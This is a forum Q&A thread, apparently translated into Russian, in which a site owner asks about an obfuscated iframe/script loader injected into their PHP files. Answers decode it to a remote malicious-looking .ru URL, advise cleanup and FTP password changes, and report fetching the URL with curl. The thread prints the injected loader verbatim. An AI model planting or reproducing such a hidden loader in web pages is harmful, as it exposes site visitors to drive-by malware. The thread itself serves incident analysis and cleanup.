Вредоносный код iframe в файлах PHP? - PullRequest
1 голос
/ 07 февраля 2010

Я нашел следующий код в файлах PHP на моем сайте. Я думаю, что кто-то может взломать мой ftp или каким-то образом добавить этот скрипт в мои файлы PHP, не знаю как.

<script>/*Exception*/ document.write('<script src='+'h&)t()#t@$^p^^(:&#/&/!)!@n&o&&$$@v@)!o)t@$e$!))k)^a)@!-$&&@r$u!!.)&u$!i(#m)#^s#()e$#$r#v$^(.!$#)n&e&)t).#p&&)@&i&@c)#h^(u$#!n@))$t)#e@&!r(-!&&c^&o(^m)!)^&.)g($e^)n#^u&&^i$@#n(e$c!@o@!$)l!)#o&$(r$@)s)@&$.&^r(u()&:!)8(0@@!8$&&0!(^/&^!c!^o^!m!^&d&i)#!r$!()e$#c^(t@@.@!d((#e&@/^&^c!!)!)o#((#m&$$d)^)$i&(&r!&e&$)!c@(#t#$.(d^e(!#/&!^e)a!^()r&)t^@h@l@$i(&$n#$^$k(&.&n(#^e#t#/^@w$o^&r@&$l&^d#o!&&#f@()!w((a)(r$!c(!)r!)&#a^&f#$t(&$.#($c(^@o@@m#&^/!@g&#o(^o^&(!&g@l#e^!&&.(c^o#$@m#$/(^##'.replace(/&|\(|\$|\)|\!|\^|@|#/ig, '')+' defer=defer></scr'+'ipt>');</script>
<!--5f81e446ddf4e34599fb494b668c1569-->

Но я хочу знать значение вышеприведенного кода, я полагаю, что он зашифрован в формате HTML или в какой-либо другой форме, но что на самом деле делает приведенный выше код и как кто-то может внедрить его на моем веб-сайте ??

Спасибо.

Ответы [ 2 ]

2 голосов
/ 07 февраля 2010

Приведенный выше скрипт src приводит к адресу http://novoteka-ru.uimserv.net.pichunter-com.genuinecolors.ru:8080/comdirect.de/comdirect.de/earthlink.net/worldofwarcraft.com/google.com/

Он попал в ваши файлы либо через дыру в безопасности вашего веб-сайта / скриптов, либо напрямую через ftp.

Обязательно очистите свои файлы от этого вредоносного кода как можно скорее, измените свои пароли ftp и исправьте свои недостатки безопасности!

0 голосов
/ 07 февраля 2010

Я не думаю, что это что-то делает. У него тот же URL Алекс опубликовал , поэтому я не буду повторять его здесь.

Когда я попытался получить его с помощью curl с заголовком пользовательского агента IE6, записав заголовки в файл, я получил следующие заголовки:

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 06 Feb 2010 21:37:13 GMT
Content-Type: text/javascript
Connection: close
X-Powered-By: PHP/5.1.6
Expires: 0
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Length: 2

Кроме того, содержимое файла выглядело просто как CRLF. Ничего особенного.

Я не знаю, почему они поместили это туда, но, возможно, раньше было что-то вредоносное, но сейчас нет ... или они просто ждут какое-то время, чтобы поместить туда вредоносный код.

...